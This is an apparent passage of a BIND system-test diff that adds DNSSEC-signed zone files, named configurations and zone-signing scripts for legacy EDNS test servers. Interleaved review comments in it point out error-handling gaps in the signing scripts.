PahfCxEMVhY9E9LKx0UsbtJJ1ZgeNsm+zF5E + 6TkzYFc+hHeYM2/Jb2PVxjTmOkbfRoDmnRCd + 9Fus/kFtbgUK6ukpaQsNgdkwtLT8++FiaJUs + ion91SQWK7wjW3Fm+zMA88K/vzSQtv9mGUry + oZ4qpK1PFpafpzUVODx3HSS5RCPGZzd4zuDR + 6u7jgRUH3mokpudb4X1qt9L6tVyMLPqAaq8= ) +ns.edns512. 60 IN A 10.53.0.6 + 60 RRSIG A 10 2 60 ( + 20441127043557 20141205043557 59033 edns512. 
+ BLCw43y8QO0QFaQpBPbMgLk3iIStBvp08qp6 + wRCslXGRNK279mlNd29ZROVwmU7jrNd5jTIt + KhYlO/9DX0JMuTrG3W+tsGkGNqx3LNsVt6/U + rfF7iAxzBjnY4MRv0DIIKJqgEuz+A/vmbGQi + L0QxukaNPycQUEnMBbNmVvEi6uETW0yMPugn + BPg2jSVbrd/lY40K1yyUme//q8ljvneU++Mg + mmQ2crmINUQX3h4NBmXoOun0T5hehqiSvz4n + TUO9rhSMWFJxCvUcjndha2MBEm3/H5MhqHqH + vEFlL9/yDScmwT6FW7yoVtcoQzPymgimBIlB + SW75upaIy6EQcx88WhANB+oEm3JsIwufcpUl + jwe7taxtCV1VYxqbqH9ynEzbUH956pE6gsvW + 1lYrqzkmKl1l4YdJEr/Um8daVT88OR8ClP/3 + v3OhAjmvnzl6WolaMPARCkFtswK8Awd61qDw + T11lTu7k0jB7Xx0JNzP2L/ehPaLokctPvECl + lMbHUryP30VnfBahCewO3/15+sUEhKrrlCif + G/MSFzDWbV11X1ItEQcBWgfcvhNfmAgQ0bsi + HgrgUuFIkmosoQUPEqJFCggTMYNZ769zEv/a + 9gJpLo5AmQqZYCn0sOw59IgXHUOsDoStB+WB + vAl9Q3ePoJ8wd+4sBC4KJs++Hw5pJ1oU+ks= ) + 0 NSEC txt500.edns512. A RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043557 20141205043557 59033 edns512. + DP0dAdDzZRS91BYNOzrHPbcGRRDTdkk+fAHi + Zb+kQ6Eur3EbXrrc/zH9UBmqircogWtOk8iv + h83G5y7Ry/tKQdrqb2igbkLo/BFsyeLKZFLh + DuWbSVvC1Hhs9tzFHVcH5gUObmlrj7wQd3T5 + Iq4ZHbQCHg4OWZbS2gn+90uL/G5OHncE2Ni9 + ELp3puFG+mO5RJJbF6CpU6vVGRs+kQyHREmj + i9kQ6C/12SHPnuIW8v/IP6EUSNb92mJk5n9P + N7EW1E67zCrHSh0rURz627hZRkpt831uod9H + Yf/Uj88zyTkprnBYdflydOzsjBiLMJwMh1CZ + BQ4EkEuRinkFeE3fmKHzv26S/HSbhVIS9E2z + nF7InmHB67uJvqj0oBTP2YFQdrDx5KWNBrqG + 4wB+OYnc6RSKrJWuvzUzyK4mCK619lVhgMi5 + Jl6kBo7swgeriVhEODJVcX1ZEkd5WUwkpumw + JReLYStQKM8AbulcLQ4/bPwurhVPDpoNK6WL + kuv0MXijsFWps43ojok6DGPD01c7FRWxAKZV + eywmEIGLSYHDnWAzVIErXuO7RPfvLIVlZJzq + nzVj0ZLDh2BrrwbLt5zoETY5Ka6d6/YUXJLQ + Y+lxqTaDuJHnTqF7vcvxdkjYtR6JhsA4nfAO + TJHTtETInoRdXBTHahG5Q6tkj3kbhqR7dBc= ) diff --git a/bin/tests/system/legacy/ns6/named.args b/bin/tests/system/legacy/ns6/named.args new file mode 100644 index 0000000..64e5524 --- /dev/null +++ b/bin/tests/system/legacy/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns6 -X named.lock -g -U 4 -T maxcachesize=2097152 -T maxudp512 
diff --git a/bin/tests/system/legacy/ns6/named.conf.in b/bin/tests/system/legacy/ns6/named.conf.in
new file mode 100644
index 0000000..17f19d9
--- /dev/null
+++ b/bin/tests/system/legacy/ns6/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "edns512" {
+ type primary;
+ file "edns512.db.signed";
+};
diff --git a/bin/tests/system/legacy/ns6/sign.sh b/bin/tests/system/legacy/ns6/sign.sh
new file mode 100755
index 0000000..6ebc2a4
--- /dev/null
+++ b/bin/tests/system/legacy/ns6/sign.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+SYSTESTDIR=legacy
+
+echo_i "sign edns512"
+
+zone=edns512
+infile=edns512.db.in
+zonefile=edns512.db
+outfile=edns512.db.signed
+
+keyname1=`$KEYGEN -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null`
+keyname2=`$KEYGEN -f KSK -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null`
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+
+$SIGNER -g -o $zone -f $outfile -e +30y $zonefile > /dev/null 2> signer.err || cat signer.err
diff --git a/bin/tests/system/legacy/ns7/edns512-notcp.db.in b/bin/tests/system/legacy/ns7/edns512-notcp.db.in
new file mode 100644
index 0000000..89f3e83
--- /dev/null
+++ b/bin/tests/system/legacy/ns7/edns512-notcp.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.7
diff --git a/bin/tests/system/legacy/ns7/edns512-notcp.db.signed b/bin/tests/system/legacy/ns7/edns512-notcp.db.signed
new file mode 100644
index 0000000..87c8036
--- /dev/null
+++ b/bin/tests/system/legacy/ns7/edns512-notcp.db.signed
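Review bot: In ns6/sign.sh the final command, `$SIGNER ... 2> signer.err || cat signer.err`, prints the signer's errors but leaves the script's exit status at 0 because `cat` succeeds, so a failed signing run looks like success to whoever invoked it. The two `$KEYGEN` calls above it send stderr to /dev/null and their output is never checked, so an empty `$keyname1` silently turns the following `cat` into reading `.key`. I would add `[ -n "$keyname1" ] && [ -n "$keyname2" ] || exit 1` after key generation and end the signer line with `|| { cat signer.err; exit 1; }`. ns7/sign.sh in this commit carries the same lines and needs the same change.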
@@ -0,0 +1,248 @@ +; File written on Fri Dec 5 16:35:58 2014 +; dnssec_signzone version 9.11.0pre-alpha +edns512-notcp. 60 IN SOA ns.edns512-notcp. marka.isc.org. ( + 1 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + 60 RRSIG SOA 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + ESBGgT1akISzDYasx1vDn4479d3zRZKvHIEb + OJIn2UqPVl6YDzcuUIqRwvFoqV7/eT4tllJ/ + DSywHFPKV5t42BvnF2bEtPJZb6GUg3ZCqja4 + CEaUNtqd4xyIT8BMT29w+d0OE6wbjaF3F3rS + RePp8RXde62vuR1rseTYLCF/V3jh1RvZCf3b + HnmavjU7Gzu6SG1IyBnxxJ43lvUOpKPbEiLa + H2MTRNzMxQ1CB7nv953XuWDjlqv37LqzQgt+ + qHYC+Tjqx5KVUMewOAbcc4sne+ohMgz9p04h + JS3TIejgOfybFcmsZnsiqPkR9GKlDJ/L6hBH + azWKrnaHgS5n/j1rIWteV70E/VKXmiVspWkj + asOQM5F/7+RZWBA/bVsJqQOUdt3o04h70bQ5 + mbPYY3AFpcpfPRVHoPAhvhMd5jdQoAY2SiI3 + Uehleuyt3K+tDPCdgRhkkFwI15OBH1Jh2Y59 + 7jvcXLqgI7T9kzUAbRpKOpR3+73Sa+UCx/Vw + iZqr03mBT8sSaZR1Zyd9y4b9yAQ7W2gHY1VM + 0N3lStdS938bwhcU5gN4ElkqXrwkCgVP8BoY + 3FotvKHUcLmnvrfKgnjcwReCJ66GeI+i205x + NcbDnmSfxYcW4VsLYA8yoQM+0NWmBBXT5JT/ + ybAmt683yRwbFnl/YovtNwXtNKMb8+FKJjw= ) + 60 NS ns.edns512-notcp. + 60 RRSIG NS 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + FLwTgbguhIW1UHjObRRogJg6RA5/32Sd7623 + +btt7TqXchUMJyQsiIdZ0g5+NKQNawnhY4CV + NwNTeEiW55fjrZJC1A+nwBXGeE0MP9a2ngkj + PNK6spLXe67hMqudgbdp3toSfx1M3jI4PJ0Q + ji1UryuIqleR6w77JiaSB55MpoVDUVui/y/Y + VYHJ2z4wVBA0upoLegE5S9fWWpWIuD8aCU9y + +WMWhUd92Jm1Z9NWc7M9cwPp5/CAmitV5wjZ + wWu17WytNbwpYBww+DB72CrvvMZvVw8fcbdC + 5FIxIr6Ed0dNjfoakcPTW5EtDTk9ms6AjdMn + edNRZXgVuGZEenqmmsfuHFvNCurrNZJHG/je + xm5qhN9N85pmBILWpJPArKxwC37i00t/28Wx + FY7H2a7RWgtHkxuvnh4pwpidr2ZD+L5hQQ+c + O7CpzQMmS+dFOLF4/FOs6d/Do/7rxs1plUgp + NjOW3ts4tK1OkKPypXovuMxyLQstrnTkCNjA + pA+K5OBXdEsmtbIhXVAlARcyXXoKnYVFqd9c + Czu0kS4xy8B/auWcBzPMVYuTWGhNWemm7J9P + 0zOOB4n6nsaM7/UIoWK7Qx1CJLLOiWdEYNur + ouS9X97/LnsRcO/SPWB0aBTJgsMVQBkDB073 + 0eZBJmUIAMidot4okbC3hQ3atQ0pGhDaAIo= ) + 0 NSEC ns.edns512-notcp. 
NS SOA RRSIG NSEC DNSKEY + 0 RRSIG NSEC 10 1 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. + JEdGV3CAGd23NG76F0B6FT6uz6TNWmP3Ecck + aI8djQLmnhu8vV1eYf4JCAS/EBOU/gS7iP+R + ziiJ3bPrvA1JSJhieTGw8K5IplUSTGHmlaIq + PfKRqN41mB9f3qI3PkN8h0Y2SbLKjYMIrHG1 + 1R3LubcKwyEc+Y4ylqySaYO7JPcGznvWiu8k + KLcvYsBOy2V9gjY2Q1BYP6TR0QyYMXDht7cR + 27YSG2D+LP0HDIFV4f7T1SLjGmDl6ROh2Rnn + i51tnK02IwoDs207RC1ExlVqD4n/3JZIkh+M + c5FoPK/fV6IRz5cdwLk1Mv2ovihxPjryFLdw + 1ULSEc7gK8EkYfedv336GgZbDEWhWQgmVhPE + h26vJNF+ZSqWlo0tkKLAKzbd8yEguPf6HY1e + 0v5KVnUV3lINJIOmWtXDZNXho8WzA4WViqqW + yn+nTnRBg/20WdpHEhVDJKywQvKY6zsXMN8G + J++lx6FalaFdgE4gNcQQsu11VQDnJO90kKBU + uVRkFQArPj0TEaUWq+ZC1eJLKtraO9w/5ybw + LaIKBJBAcyU2jy7ieRc+NEY6rE2XOfJs0kEa + 8q5vM9/AFbX01yUEKnYj2CO/VhtfUa2tHEVo + JhATux63HBiTwhiYcyjfKhYcML2KoEYUCYU/ + DAdy4zrs352EC3gVxagyUxCNJZ1Bq0wq+jI= ) + 60 DNSKEY 256 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; ZSK; alg = RSASHA512; key id = 59033 + 60 DNSKEY 257 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 
5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; KSK; alg = RSASHA512; key id = 59034 + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + IrMpyEssdfDiqBDfMI5BVicoN5Upu20Bq0eL + BKXuiYBoRhBJhBnv6bovD0XWMf0spgPMHz4f + lgc0zT+41lQykiydy6WDLJ184E4If35ip9jp + Lj2yJGKUCr1FrvtciYPmYuH3wBIWl5wNlzJd + qH3P6nO3xYU4lgsBQPDUKvLHX7HIuSJB+2by + wbs3jj5Q78Ri1ELqKCCicfKbZwsRY9vexjw8 + ptuJh+Y8kvhM/Yh7NyG5PByb5GRVVCCZ20ms + msBCiniPb/5IFiy7iUUiderLsa3y4UauTOKD + pKiOkBbB0XfxZtAsTZFU2W5seo6eoW3LfLp5 + fD/qqUKyRZzPZaqJmp2n7egmX3WmRw11ILXk + LEuXA3P65YVbfqv08lZHz5K6xFhWsIJoBeev + 2leb3hN6nmSFApltdF0PDEfq1ZV+sBpOBsKN + EekIGAYO28u3+7pjxMzMe5EMtDAajb9bZCT6 + 3ZTMPjlyT5ChtNRSIvgzgbfYAn1bigtQ+Opu + Jp82U+N1FRBNaSz7uw2uDAiE/cSNgfGIC7Dd + KBzWE6z/HFCzQp/gF8006AjztDq/SnyHWnWX + RzfMi1pE2IOT/GoCKOQwQNei0cG/ar+/ntVp + 3yg9PbYdhdMH8IQ1GpwczFfD1/I2/wuOGzPw + 1iFhd3dT9Sz2xgF/8xS95Ljgy8YgP+pmE3c= ) + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043558 20141205043558 59034 edns512-notcp. 
+ VusByVbeIayH6KfnbhxLKycQfjU2L2Ilfa9o + K/MjEve4vMjqKeYV0oNan2X4DvPZusKeMVJp + JhQxvBz2GXE6syjrL5eEQtdcn6MW5Ew40w2E + i7BCGiHYrxH+SJqSORl5pBjihe24dRWoHHt/ + 3CVBE18TU+ubSdLgOT3SvBtffJ1NVtvtCgpP + /yIgffhHOU/F0J+ewL6lmYzrkj/48Ep8F9e9 + suAoorKmRP4zmeiojQedM+4PfbRn0doOLFIR + 8RZK8rv9WeQv1mhUh9s0zY4UARRGRb9i8Zhr + ERor3lZprmujx/Ok6XndTW7vRY/0IfC2i99C + 0zfcIdzuZ96YtiUFFTynptz3yxrJqQxeJaFt + vuZ4rd5XqSb3uPu8wVzYJEwhNRPJGqBpRAba + vxqOV1HAw89t1sUKXQR2qQ4HvpIzRIxFpIKQ + hRPMyd6uz0EtPQFE6ri1C5JkZkbdZ0r5SauY + EqZMsIl8oGtt1S5kEK2Agqx4b1pUfSv6cOLb + 765SGYVr1RdjmFZ7ftYYZPyMKJl6t3/ruZ9f + iazQGzoO6O+nQq3DD8EjZynsnAedzyEe3Hxd + tJM1Rm3nWAPka4QV5hdzpU93N/ao4tRuCYp/ + 4pnVlc8MStuyuy9RRapEoOMs0iIQFPdidU+V + aM+ZSOa6RbYwzvzmX7I1UxBf5gKJzuDydDA= ) +ns.edns512-notcp. 60 IN A 10.53.0.7 + 60 RRSIG A 10 2 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + eY/gUZcEKDE0loJ4zaxwJDg4E/S+ILJOrJrC + Yb64VWSE7RAzoQt8gYXAcEec4NLo2ZFsckTL + O0jD4db+q1rJLtniw+Xg/fckXvjxt21jNR43 + +rW17ZuEYYlOWg9o+NyP9QnLjxNOR22f6gSx + FCLOca+8Yoxf4bw7EsdV98KajMFpcljQu2iE + NOKCoDSdunaZnhdP8kVuXO7P+VEXRa1OFzxb + mm2axihSqXcA7vdEdpGmTWoUFdG7p61Kl8Jw + rQzT7RiA3PoeyYoQ2wC2oitRr4lnsN/IF1vz + D3ldJ6pnYNVYmSHaS2potOMNDSTZtgV2LUmx + pqsaa3coYaJPJj0ijWzxw77nAXXQ7u/YWIzz + vUhXKygQIZaInl1msFPkFRy4AqriDmDnAAfJ + YyPunq7VkR2ExUhU1iFGGmDFE35ktxFl6AWL + /0CWElHPwuvqGksLnxrE7Syr25TOC+EhqDUS + G5X7/7Cb+Hl/twlA4oYDv8eXCwxMsncMp1cn + VDfwOrN4/JWzYcqNLTZHFRr+Uz7Fo8tGAri0 + p7yDVHg35QN7usMKfsU3WnoOm1VlD/sU8bTW + 32dudd3yauhdKlmytZ2s2PMrXBf7/fsjDlY6 + ZEc91TwM9Yt71FQ27XKoP5eFGajlxG+haoyB + 6jfoV4cIDq4MVerLOSUlczFjczbBXLHwLno= ) + 0 NSEC txt500.edns512-notcp. A RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. 
+ mR1PHdEWNP90/80SAlKkj7jV0hBj0eDxM5Q0 + RGPbv2pb1fOT/W8dTe2Qm/qwE0aY4nmRfiah + 8klCAXH9gvVAQFbPlz8tkLKEOrKjZM/YP9Vd + EoUmYj6+G2OXYvvetVStpqfiSK731iPUhKUD + Y0uYUzTyqgmOyyKWApk1+C+b3fYNS2E0jA77 + riOCULE2FSPim7cEGS7JWE22qRY4//ENQZ27 + eA+KbkXWR+vdqnQ6vs1cIwsbGbFFzmcogMT2 + 3cN1e2lNbzTZIpVd9ukwp8FqyT0p7oz+q5r/ + so4Zq0EGx473OgThMfTMs6pOg7L6M60jMhmF + 8V50dpePHmFLxI/Nn4kvxcUt684L3TWGObFQ + y9vxO8Wh66+USSX8jyDnP8mtMnGEeHD9SVYz + WIbCDVUsvSkFqSi/2o1/SZYWQ+wXkj6qO2Mz + JIgJKucALub0dOfaoncPYa7kfOxEOmgwY39I + RQodc53Brhgn6IF/1zNxZd5/FpWUs4ivrpsN + MOKy/E+MJiaGOdj1RwNlDdZQNtamexxOjcaD + 6pWAD44LgakoELE0Ktxtl/oMmouky0Dx/zwN + e9nEBTe9nTbG99lbzuGZ2vWkfqA1EsliCryd + wH6+EF3l5w9EEKBdVgBIEoHZ92TaiiJfRmFQ + LwEjS+AYjQKzmvp47lGqQf8/ggvMxcv/SCE= ) +txt500.edns512-notcp. 60 IN TXT "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" + 60 RRSIG TXT 10 2 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. 
+ fpzr1/DNby1CMHfZclvga7Pk9S3tqWn0wwC9 + xsUhYoPRcaIN4o9g5rOC0fxX1W4Q6gEXt0l2 + fKzUdxE9QqTgpJOAOcMJa7D1yRo2ifVoX3Oq + M2lUYusg3o0Wg1JuNnf3DXaSaLOiYOrS2ixs + XnPwU0pLiniGIT9Bh2OuMBPs5YP2dZRKKJ7z + VrxE4F213A0FQfN68tIbN5XrzwO8EfyjBTyM + YtApC33vMajYeILnFemLrs9VL5hbLoyKcyqg + 1n0eSXhneHlYgsS5anSXWOSd9sT46jqpFwYF + O+frR2DNmdua4eZiUqA9HMgvaQnNodVU2Z5r + 5lzrHSVSXS/Au7kp4FZtYCUj2W4m/grOidH9 + ulwM0Ut+OZOOLHVcwBQGuedEEwU/h+YGbJH6 + fomTvfW+NAaL6X3IJggcQnHmCOTf0f3xXeXT + iHK1hE+iabTQ8gCabt4KCQ11Oz8zu3j7ZB5T + 2byQ49N2jj+i8+p2wsRbnz5Algx15KP11NM0 + lUb+fhPlIrhbgwqPtv8udeRsBpRAwHXWrz5m + BxWQ5X52frQAPNoi51q5tTWE7UlpLYFBeXtW + 0XY7o6+TqP+EN5lGwddNhS0wYRWE10M2Es8A + 2q1RKIBDSPB3XEeULrQ6ciDgiDQ7T55p1KKM + r25OyqYCGZs9obDHnNVNQP2rTjfm6062TSo= ) + 0 NSEC edns512-notcp. TXT RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. + pTTiIXjWLSH1Qm59kZlX0QmXtm7gDhL4RdQF + sHMtxZA1JhWjBC3u48C8M19ZWTu1xmTrhuil + tPV9a4u9zTasPWOy2HSKnl/jMaqGZ3xa96mo + I1qULVqb8XRTYqPsJ3reD6x9jJepEFAsK+xa + /TdrFTfZ5Oc0RYLQxH2qrJVc2n7S5gCHp10O + extcck2cyhiaRnI/wha6PdAXKG0ikX/oKAQL + hMcNUpOeewJLTvXasVPf4cF9O0B1/wXun3C4 + lkzKF+fYBe2qg6ikGgsHws72/TYD2xDOae41 + yjkVwdthTECDzedPc6jbKeApyEGA1G2lc7Ie + DE1rLRP3OhME5X9bhPcQnop4k583RQI0QY60 + PUdZ/cr99eM6Zj3Mal6zBrebPiBAJVnr8C4X + /ozv3MFmaoNalB0JuTVojCboQ6Sf7+UCumXk + VK56zx6ZiGcwtnKHRQZIGGsHpPt28zo33wKJ + 0xljGuxfnxstGGmUUCTrhi0U/8991ZdqnjHg + hBkWxmEm1X5ioIVy5c5M6baSoEmls4iwad/O + vU9cx0aXxqir7/5jYlMFjn6Xo2BuUVQWf/LY + E9rZRZUN0a4sh7Wj8pjKS1hJ5pTK9C3ijEqD + Y9B5OslWHcOhSlv4q9YwuZkBo/b8UiV6EOnS + vE/TgzfP7DcXjTI5qErka0iJMxz/m90VuiU= ) diff --git a/bin/tests/system/legacy/ns7/named.args b/bin/tests/system/legacy/ns7/named.args new file mode 100644 index 0000000..e491a95 --- /dev/null +++ b/bin/tests/system/legacy/ns7/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns7 -X named.lock -g -U 4 -T maxcachesize=2097152 -T maxudp512 
diff --git a/bin/tests/system/legacy/ns7/named.conf.in b/bin/tests/system/legacy/ns7/named.conf.in
new file mode 100644
index 0000000..ada7d4f
--- /dev/null
+++ b/bin/tests/system/legacy/ns7/named.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ max-udp-size 4096;
+ edns-udp-size 4096;
+ nocookie-udp-size 4096;
+};
+
+zone "edns512-notcp" {
+ type primary;
+ file "edns512-notcp.db.signed";
+};
diff --git a/bin/tests/system/legacy/ns7/named.notcp b/bin/tests/system/legacy/ns7/named.notcp
new file mode 100644
index 0000000..e25c3a8
--- /dev/null
+++ b/bin/tests/system/legacy/ns7/named.notcp
@@ -0,0 +1 @@
+notcp
diff --git a/bin/tests/system/legacy/ns7/sign.sh b/bin/tests/system/legacy/ns7/sign.sh
new file mode 100755
index 0000000..90ceca9
--- /dev/null
+++ b/bin/tests/system/legacy/ns7/sign.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+SYSTESTDIR=legacy
+
+echo_i "sign edns512-notcp"
+
+zone=edns512-notcp
+infile=edns512-notcp.db.in
+zonefile=edns512-notcp.db
+outfile=edns512-notcp.db.signed
+
+keyname1=`$KEYGEN -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null`
+keyname2=`$KEYGEN -f KSK -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null`
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+
+$SIGNER -g -o $zone -f $outfile -e +30y $zonefile > /dev/null 2> signer.err || cat signer.err
+
+keyfile_to_static_ds $keyname2 > trusted.conf
+cp trusted.conf ../ns1
diff --git a/bin/tests/system/legacy/ns8/ednsformerr.db b/bin/tests/system/legacy/ns8/ednsformerr.db
new file mode 100644
index 0000000..9aa3a4a
--- /dev/null
+++ b/bin/tests/system/legacy/ns8/ednsformerr.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.8
diff --git a/bin/tests/system/legacy/ns8/named.conf.in b/bin/tests/system/legacy/ns8/named.conf.in
new file mode 100644
index 0000000..7431cf8
--- /dev/null
+++ b/bin/tests/system/legacy/ns8/named.conf.in
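Review bot: The last two lines of ns7/sign.sh, `keyfile_to_static_ds $keyname2 > trusted.conf` and `cp trusted.conf ../ns1`, run unconditionally, so when `$KEYGEN` fails (its stderr goes to /dev/null) or `$SIGNER` fails, ns1 still receives a trusted.conf that does not match the zone being served. A trust-anchor file should only be published after the zone it anchors was signed successfully. I would stop early with `[ -n "$keyname2" ] || exit 1` before the `cat`, and chain the last two commands as `keyfile_to_static_ds $keyname2 > trusted.conf && cp trusted.conf ../ns1`. How keyfile_to_static_ds reacts to an empty argument is not visible here; it presumably comes from conf.sh.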
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "ednsformerr" {
+ type primary;
+ file "ednsformerr.db";
+};
